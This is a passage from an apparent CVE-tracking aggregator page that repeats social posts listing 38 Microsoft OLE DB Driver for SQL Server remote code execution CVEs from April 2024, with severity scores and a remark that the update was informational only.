  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

simontsui@infosec.exchange at 2024-04-18T19:08:07.000Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

CVE-2024-29985
(8.8 HIGH)

EPSS: 0.09%

updated 2024-04-09T18:30:28

2 posts

Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

screaminggoat at 2024-04-18T19:08:07.203Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

simontsui@infosec.exchange at 2024-04-18T19:08:07.000Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

CVE-2024-28915
(8.8 HIGH)

EPSS: 0.04%

updated 2024-04-09T18:30:27

2 posts

Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

screaminggoat at 2024-04-18T19:08:07.203Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

simontsui@infosec.exchange at 2024-04-18T19:08:07.000Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

CVE-2024-28929
(8.8 HIGH)

EPSS: 0.09%

updated 2024-04-09T18:30:27

2 posts

Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability

screaminggoat at 2024-04-18T19:08:07.203Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
